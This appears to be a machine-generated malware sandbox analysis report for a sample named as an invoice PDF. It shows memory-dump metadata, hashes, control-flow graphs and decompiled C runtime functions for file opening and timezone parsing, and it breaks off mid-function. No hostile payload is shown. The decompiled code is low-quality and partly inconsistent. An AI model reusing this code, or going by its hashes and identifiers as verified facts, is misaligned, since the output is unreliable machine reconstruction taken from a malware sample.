                            0x00000000
                            0x00000000
                            0x01322432
                            0x01322432
                            0x01322435
                            0x01322438
                            0x0132243b
                            0x01322442
                            0x01322447
                            0x01322449
                            0x0132244d
                            0x01322468
                            0x0132246c
                            0x0132246d
                            0x01322470
                            0x01322471
                            0x0132247d
                            0x01322473
                            0x01322473
                            0x01322473
                            0x0132244f
                            0x0132244f
                            0x0132244f
                            0x0132245a
                            0x0132245f
                            0x01322462
                            0x01322462
                            0x00000000
                            0x01322447
                            0x0132239e
                            0x0132239e
                            0x013223a1
                            0x013223a8
                            0x013223ad
                            0x00000000
                            0x00000000
                            0x013223b6
                            0x013223bc
                            0x013223be
                            0x00000000
                            0x00000000
                            0x013223c0
                            0x013223c4
                            0x00000000
                            0x00000000
                            0x013223d8
                            0x013223de
                            0x013223e0
                            0x01322404
                            0x01322407
                            0x00000000
                            0x01322407
                            0x013223e2
                            0x00000000
                            0x0132225e
                            0x01322263
                            0x0132226e
                            0x013223ef
                            0x013223ef
                            0x013223ef
                            0x013223f2
                            0x013223f3
                            0x00000000
                            0x013223fb
                            0x0132225c
                            0x01322211
                            0x01322216
                            0x0132221d
                            0x01322223
                            0x00000000
                            0x01322223
                            0x013221eb
                            0x013221ee
                            0x013221f8
                            0x013221f8
                            0x013221fb
                            0x013221fe
                            0x00000000
                            0x013221fe
                            0x013221f2
                            0x013221f4
                            0x013221f6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013221f6
                            0x013221a2
                            0x013221a7
                            0x013221af
                            0x00000000
                            0x0132213a
                            0x0132213f
                            0x01322142
                            0x01322147
                            0x013224d4
                            0x00000000
                            0x013224d4

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: 78236698ffccf9f7c0bd7d61901188ca298b659cdec5451fd4b7c839d0a2ac4d
                            • Instruction ID: f737d7feebc91e03a62f3857952f2b1c5323acdf44f7e709eedeafb4a9c49f8a
                            • Opcode Fuzzy Hash: 78236698ffccf9f7c0bd7d61901188ca298b659cdec5451fd4b7c839d0a2ac4d
                            • Instruction Fuzzy Hash: 0FC1D474D0426AAFDF15EFADDC40BAEBBB4AF1A308F044185EA51A7382C7749941CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132BD1F, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 219 132bd1f-132bd4f call 132baf3 222 132bd51-132bd5c call 131c9bb 219->222 223 132bd6a-132bd76 call 131e783 219->223 228 132bd5e-132bd65 call 131c9ce 222->228 229 132bd78-132bd8d call 131c9bb call 131c9ce 223->229 230 132bd8f-132bdd8 call 132ba5e 223->230 237 132c041-132c047 228->237 229->228 239 132be45-132be4e GetFileType 230->239 240 132bdda-132bde3 230->240 243 132be50-132be81 GetLastError call 131c998 CloseHandle 239->243 244 132be97-132be9a 239->244 241 132bde5-132bde9 240->241 242 132be1a-132be40 GetLastError call 131c998 240->242 241->242 246 132bdeb-132be18 call 132ba5e 241->246 242->228 243->228 258 132be87-132be92 call 131c9ce 243->258 249 132bea3-132bea9 244->249 250 132be9c-132bea1 244->250 246->239 246->242 251 132bead-132befb call 131e6cc 249->251 252 132beab 249->252 250->251 261 132bf0b-132bf2f call 132b811 251->261 262 132befd-132bf09 call 132bc6f 251->262 252->251 258->228 269 132bf42-132bf85 261->269 270 132bf31 261->270 262->261 268 132bf33-132bf3d call 13218f4 262->268 268->237 271 132bfa6-132bfb4 269->271 272 132bf87-132bf8b 269->272 270->268 275 132bfba-132bfbe 271->275 276 132c03f 271->276 272->271 274 132bf8d-132bfa1 272->274 274->271 275->276 278 132bfc0-132bff3 CloseHandle call 132ba5e 275->278 276->237 281 132c027-132c03b 278->281 282 132bff5-132c021 GetLastError call 131c998 call 131e895 278->282 281->276 282->281
                            C-Code - Quality: 42%
                            			E0132BD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				void* _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t240 = __edx;
				_t263 = E0132BAF3(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t263, _t192 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t192 + _t192;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E0131E783(_t240, _t249, _t264, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t197 = 0;
						_t122 = E0132BA5E(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0131E6CC(_t197,  *_t190, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x1346108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t279,  &_v48, _t206 << 2);
									_t134 = E0132B811(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x1346108 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
											_t246 = E0132BA5E();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x1346108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
												goto L31;
											}
											E0131C998(GetLastError());
											 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0131E895( *_t190);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E0132BC6F(_t205,  *_t190);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E013218F4(__eflags,  *_t190);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E0131C998(_t271);
							 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E0131C9CE())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x1346108 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0131C998(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t239 << 2);
						_t197 = 0;
						_t253 = E0132BA5E();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0131C9BB()) =  *_t186 & 0x00000000;
						 *_t190 = _t264;
						 *((intOrPtr*)(E0131C9CE())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0131C9BB()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E0131C9CE()));
				}
			}























































                            0x0132bd1f
                            0x0132bd42
                            0x0132bd46
                            0x0132bd47
                            0x0132bd47
                            0x0132bd47
                            0x0132bd49
                            0x0132bd4f
                            0x0132bd6a
                            0x0132bd6f
                            0x0132bd72
                            0x0132bd74
                            0x0132bd76
                            0x0132bd95
                            0x0132bd9c
                            0x0132bda3
                            0x0132bda6
                            0x0132bdb2
                            0x0132bdb5
                            0x0132bdbd
                            0x0132bdbe
                            0x0132bdc1
                            0x0132bdc1
                            0x0132bdc3
                            0x0132bdc8
                            0x0132bdca
                            0x0132bdcd
                            0x0132bdd5
                            0x0132bdd8
                            0x0132be45
                            0x0132be46
                            0x0132be4c
                            0x0132be4e
                            0x0132be97
                            0x0132be9a
                            0x0132bea3
                            0x0132bea6
                            0x0132bea9
                            0x0132beab
                            0x0132beab
                            0x0132beab
                            0x0132be9c
                            0x0132be9f
                            0x0132be9f
                            0x0132beb0
                            0x0132beb3
                            0x0132bebf
                            0x0132bec4
                            0x0132bed0
                            0x0132beda
                            0x0132bede
                            0x0132bee8
                            0x0132beeb
                            0x0132bef6
                            0x0132befb
                            0x0132bf0b
                            0x0132bf0e
                            0x0132bf12
                            0x0132bf13
                            0x0132bf19
                            0x0132bf1e
                            0x0132bf21
                            0x0132bf23
                            0x0132bf25
                            0x0132bf2a
                            0x0132bf2d
                            0x0132bf2f
                            0x0132bf59
                            0x0132bf7d
                            0x0132bf81
                            0x0132bf85
                            0x0132bf87
                            0x0132bf8b
                            0x0132bf8d
                            0x0132bf97
                            0x0132bf9a
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bf8b
                            0x0132bfa6
                            0x0132bfb2
                            0x0132bfb4
                            0x0132c03f
                            0x0132c03f
                            0x00000000
                            0x0132bfba
                            0x0132bfba
                            0x0132bfbe
                            0x00000000
                            0x00000000
                            0x0132bfc3
                            0x0132bfd5
                            0x0132bfdd
                            0x0132bfe0
                            0x0132bfe1
                            0x0132bfe4
                            0x0132bfeb
                            0x0132bff0
                            0x0132bff3
                            0x0132c027
                            0x0132c031
                            0x0132c031
                            0x0132c03b
                            0x00000000
                            0x0132c03b
                            0x0132bffc
                            0x0132c015
                            0x0132c01c
                            0x0132be3f
                            0x00000000
                            0x0132be3f
                            0x0132bfb4
                            0x0132bf31
                            0x00000000
                            0x0132befd
                            0x0132bf04
                            0x0132bf07
                            0x0132bf09
                            0x0132bf33
                            0x0132bf35
                            0x00000000
                            0x0132bf3b
                            0x00000000
                            0x0132bf09
                            0x0132befb
                            0x0132be56
                            0x0132be59
                            0x0132be74
                            0x0132be79
                            0x0132be7f
                            0x0132be81
                            0x0132be8c
                            0x0132be8c
                            0x00000000
                            0x0132be81
                            0x0132bdda
                            0x0132bde1
                            0x0132bde3
                            0x0132be1a
                            0x0132be1a
                            0x0132be24
                            0x0132be27
                            0x0132be2e
                            0x0132be2e
                            0x0132be2e
                            0x0132be3a
                            0x00000000
                            0x0132be3a
                            0x0132bde5
                            0x0132bde9
                            0x00000000
                            0x00000000
                            0x0132bdeb
                            0x0132bdfa
                            0x0132bdff
                            0x0132be02
                            0x0132be03
                            0x0132be06
                            0x0132be06
                            0x0132be0d
                            0x0132be0f
                            0x0132be12
                            0x0132be15
                            0x0132be18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132bd78
                            0x0132bd7d
                            0x0132bd80
                            0x0132bd87
                            0x00000000
                            0x0132bd87
                            0x0132bd51
                            0x0132bd56
                            0x0132bd5c
                            0x0132bd5e
                            0x00000000
                            0x0132bd63

                            APIs
                              • Part of subcall function 0132BA5E: CreateFileW.KERNEL32(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            • GetLastError.KERNEL32 ref: 0132BE33
                            • __dosmaperr.LIBCMT ref: 0132BE3A
                            • GetFileType.KERNEL32(00000000), ref: 0132BE46
                            • GetLastError.KERNEL32 ref: 0132BE50
                            • __dosmaperr.LIBCMT ref: 0132BE59
                            • CloseHandle.KERNEL32(00000000), ref: 0132BE79
                            • CloseHandle.KERNEL32(?), ref: 0132BFC3
                            • GetLastError.KERNEL32 ref: 0132BFF5
                            • __dosmaperr.LIBCMT ref: 0132BFFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction ID: 1677a5719b423ada13280ea3b751034c7d546d6b5266aea8b311a38d52ffd5a3
                            • Opcode Fuzzy Hash: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction Fuzzy Hash: F0A15632A041299FDF2DEF7CD881BADBBA5AB06328F140159E815DF396DB359802CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132AFBE, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 287 132afbe-132afe6 call 132abfc call 132ac5a 292 132b186-132b1bb call 1321798 call 132abfc call 132ac5a 287->292 293 132afec-132aff8 call 132ac02 287->293 319 132b2e3-132b33f call 1321798 call 1326cc0 292->319 320 132b1c1-132b1cd call 132ac02 292->320 293->292 298 132affe-132b009 293->298 300 132b00b-132b00d 298->300 301 132b03f-132b048 call 13209eb 298->301 303 132b00f-132b013 300->303 310 132b04b-132b050 301->310 307 132b015-132b017 303->307 308 132b02f-132b031 303->308 311 132b02b-132b02d 307->311 312 132b019-132b01f 307->312 313 132b034-132b036 308->313 310->310 315 132b052-132b073 call 1320a25 call 13209eb 310->315 311->313 312->308 316 132b021-132b029 312->316 317 132b180-132b185 313->317 318 132b03c 313->318 315->317 335 132b079-132b07c 315->335 316->303 316->311 318->301 336 132b341-132b347 319->336 337 132b349-132b34c 319->337 320->319 327 132b1d3-132b1df call 132ac2e 320->327 327->319 338 132b1e5-132b206 call 13209eb GetTimeZoneInformation 327->338 339 132b07f-132b084 335->339 340 132b38f-132b3a1 336->340 337->340 343 132b34e-132b35e call 1320a25 337->343 350 132b2bf-132b2e2 call 132abf6 call 132abea call 132abf0 338->350 351 132b20c-132b22d 338->351 339->339 342 132b086-132b098 call 1320a73 339->342 344 132b3a3-132b3a6 340->344 345 132b3b1 call 132b193 340->345 342->292 360 132b09e-132b0b1 call 13250a9 342->360 361 132b360 343->361 362 132b368-132b381 call 1326cc0 343->362 344->345 349 132b3a8-132b3af call 132afbe 344->349 359 132b3b6-132b3cd call 13209eb call 131786a 345->359 349->359 357 132b237-132b23e 351->357 358 132b22f-132b234 351->358 367 132b240-132b247 357->367 368 132b256-132b259 357->368 358->357 360->292 384 132b0b7-132b0ba 360->384 363 132b361-132b366 call 13209eb 361->363 379 132b383-132b384 362->379 380 132b386-132b38c call 13209eb 362->380 387 132b38e 363->387 367->368 374 132b249-132b254 367->374 376 132b25c-132b27d call 1327d59 WideCharToMultiByte 368->376 374->376 396 132b28b-132b28d 376->396 397 132b27f-132b282 376->397 379->363 380->387 385 132b0c2-132b0cb 384->385 386 132b0bc-132b0c0 384->386 392 132b0ce-132b0db call 1321594 385->392 393 132b0cd 385->393 386->384 386->385 387->340 405 132b0de-132b0e2 392->405 393->392 399 132b28f-132b2ab WideCharToMultiByte 396->399 397->396 398 132b284-132b289 397->398 398->399 401 132b2ba-132b2bd 399->401 402 132b2ad-132b2b0 399->402 401->350 402->401 404 132b2b2-132b2b8 402->404 404->350 406 132b0e4-132b0e6 405->406 407 132b0ec-132b0ed 405->407 408 132b0e8-132b0ea 406->408 409 132b0ef-132b0f2 406->409 407->405 408->407 408->409 410 132b136-132b138 409->410 411 132b0f4-132b107 call 1321594 409->411 412 132b13a-132b13c 410->412 413 132b13f-132b14e 410->413 420 132b10e-132b112 411->420 412->413 415 132b150-132b162 call 13250a9 413->415 416 132b166-132b169 413->416 418 132b16c-132b17e call 132abf6 call 132abea 415->418 427 132b164 415->427 416->418 418->317 422 132b114-132b117 420->422 423 132b109-132b10b 420->423 422->410 426 132b119-132b129 call 1321594 422->426 423->422 428 132b10d 423->428 433 132b130-132b134 426->433 427->292 428->420 433->410 434 132b12b-132b12d 433->434 434->410 435 132b12f 434->435 435->433
                            C-Code - Quality: 78%
                            			E0132AFBE(void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				void* _t80;
				signed int _t84;
				signed int _t88;
				signed int _t90;
				long _t92;
				signed int* _t95;
				signed int _t98;
				signed int _t101;
				signed int _t105;
				void* _t112;
				signed int _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t130;
				void* _t132;
				signed int _t133;
				signed int _t135;
				void* _t141;
				intOrPtr _t142;
				void* _t144;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int _t159;
				signed int _t162;
				intOrPtr* _t167;
				intOrPtr _t168;
				signed int _t169;
				intOrPtr* _t170;
				void* _t171;
				void* _t172;
				signed int _t173;
				int _t177;
				signed int _t179;
				char** _t180;
				signed int _t184;
				signed int _t186;
				void* _t195;
				signed int _t196;
				void* _t197;
				signed int _t198;

				_push(_t179);
				_t65 = E0132ABFC();
				_v8 = _v8 & 0x00000000;
				_t135 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t135;
				if(E0132AC5A( &_v8) != 0 || E0132AC02( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01321798();
					asm("int3");
					_t195 = _t197;
					_t198 = _t197 - 0x10;
					_push(_t135);
					_t180 = E0132ABFC();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E0132AC5A( &_v52);
					_t144 = _t179;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E01321798();
						asm("int3");
						_push(_t195);
						_t196 = _t198;
						_t74 =  *0x133c008; // 0xa212446c
						_v100 = _t74 ^ _t196;
						 *0x133c91c =  *0x133c91c | 0xffffffff;
						 *0x133c910 =  *0x133c910 | 0xffffffff;
						_push(0);
						_push(_t180);
						_push(_t172);
						_t137 = "TZ";
						_t173 = 0;
						 *0x1346578 = 0;
						_t78 = E01326CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ"); // executed
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t186 = E01320A25(_t144, _v276);
								__eflags = _t186;
								if(__eflags != 0) {
									_t84 = E01326CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
									__eflags = _t84;
									if(_t84 == 0) {
										E013209EB(0);
										_t173 = _t186;
									} else {
										_push(_t186);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E013209EB();
								}
							}
						} else {
							_t173 =  &_v272;
						}
						asm("sbb esi, esi");
						_t184 =  ~(_t173 -  &_v272) & _t173;
						__eflags = _t173;
						if(_t173 == 0) {
							L80:
							L47(); // executed
						} else {
							__eflags =  *_t173;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t173);
								E0132AFBE(__eflags);
							}
						}
						_t80 = E013209EB(_t184);
						__eflags = _v16 ^ _t196;
						E0131786A();
						return _t80;
					} else {
						_t88 = E0132AC02( &_v16);
						_pop(_t144);
						__eflags = _t88;
						if(_t88 != 0) {
							goto L66;
						} else {
							_t90 = E0132AC2E( &_v20);
							_pop(_t144);
							__eflags = _t90;
							if(_t90 != 0) {
								goto L66;
							} else {
								E013209EB( *0x1346574);
								 *0x1346574 = 0;
								 *_t198 = 0x1346580; // executed
								_t92 = GetTimeZoneInformation(??); // executed
								__eflags = _t92 - 0xffffffff;
								if(_t92 != 0xffffffff) {
									_t151 =  *0x1346580 * 0x3c;
									_t169 =  *0x13465d4; // 0x0
									_push(_t172);
									 *0x1346578 = 1;
									_v12 = _t151;
									__eflags =  *0x13465c6; // 0xb
									if(__eflags != 0) {
										_t152 = _t151 + _t169 * 0x3c;
										__eflags = _t152;
										_v12 = _t152;
									}
									__eflags =  *0x134661a; // 0x3
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t105 =  *0x1346628; // 0xffffffc4
										__eflags = _t105;
										if(_t105 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t105 - _t169) * 0x3c;
										}
									}
									_t177 = E01327D59(0, _t169);
									_t98 = WideCharToMultiByte(_t177, 0, "Pacific Standard Time", 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
									__eflags = _t98;
									if(_t98 == 0) {
										L60:
										 *( *_t180) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t180)[0x3f] = 0;
										}
									}
									_t101 = WideCharToMultiByte(_t177, 0, "Pacific Daylight Time", 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
									__eflags = _t101;
									if(_t101 == 0) {
										L64:
										 *(_t180[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t180[1][0x3f] = 0;
										}
									}
								}
								 *(E0132ABF6()) = _v12;
								 *((intOrPtr*)(E0132ABEA())) = _v16;
								_t95 = E0132ABF0();
								 *_t95 = _v20;
								return _t95;
							}
						}
					}
				} else {
					_t170 =  *0x1346574; // 0x0
					_t179 = _a4;
					if(_t170 == 0) {
						L12:
						E013209EB(_t170);
						_t155 = _t179;
						_t12 = _t155 + 1; // 0x132b3af
						_t171 = _t12;
						do {
							_t112 =  *_t155;
							_t155 = _t155 + 1;
						} while (_t112 != 0);
						_t13 = _t155 - _t171 + 1; // 0x132b3b0
						 *0x1346574 = E01320A25(_t155 - _t171, _t13);
						_t115 = E013209EB(0);
						_t168 =  *0x1346574; // 0x0
						if(_t168 == 0) {
							goto L45;
						} else {
							_t159 = _t179;
							_push(_t172);
							_t14 = _t159 + 1; // 0x132b3af
							_t172 = _t14;
							do {
								_t116 =  *_t159;
								_t159 = _t159 + 1;
							} while (_t116 != 0);
							_t15 = _t159 - _t172 + 1; // 0x132b3b0
							_t118 = E01320A73(_t168, _t15, _t179);
							_t197 = _t197 + 0xc;
							if(_t118 != 0) {
								goto L46;
							} else {
								_t172 = 3;
								_push(_t172);
								_t119 = E013250A9(_t160,  *_t135, 0x40, _t179);
								_t197 = _t197 + 0x10;
								if(_t119 != 0) {
									goto L46;
								} else {
									while( *_t179 != 0) {
										_t179 = _t179 + 1;
										_t172 = _t172 - 1;
										if(_t172 != 0) {
											continue;
										}
										break;
									}
									_pop(_t172);
									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
									if(_t135 != 0) {
										_t179 = _t179 + 1;
									}
									_t162 = E01321594(_t160, _t179) * 0xe10;
									_v8 = _t162;
									while(1) {
										_t121 =  *_t179;
										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
											break;
										}
										_t179 = _t179 + 1;
									}
									__eflags =  *_t179 - 0x3a;
									if( *_t179 == 0x3a) {
										_t179 = _t179 + 1;
										_t162 = _v8 + E01321594(_t162, _t179) * 0x3c;
										_v8 = _t162;
										while(1) {
											_t130 =  *_t179;
											__eflags = _t130 - 0x30;
											if(_t130 < 0x30) {
												break;
											}
											__eflags = _t130 - 0x39;
											if(_t130 <= 0x39) {
												_t179 = _t179 + 1;
												__eflags = _t179;
												continue;
											}
											break;
										}
										__eflags =  *_t179 - 0x3a;
										if( *_t179 == 0x3a) {
											_t179 = _t179 + 1;
											_t162 = _v8 + E01321594(_t162, _t179);
											_v8 = _t162;
											while(1) {
												_t132 =  *_t179;
												__eflags = _t132 - 0x30;
												if(_t132 < 0x30) {
													goto L38;
												}
												__eflags = _t132 - 0x39;
												if(_t132 <= 0x39) {
													_t179 = _t179 + 1;
													__eflags = _t179;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t135;
									if(_t135 != 0) {
										_v8 = _t162;
									}
									__eflags =  *_t179;
									_t123 = 0 |  *_t179 != 0x00000000;
									_v16 = _t123;
									__eflags = _t123;
									_t124 = _v12;
									if(_t123 == 0) {
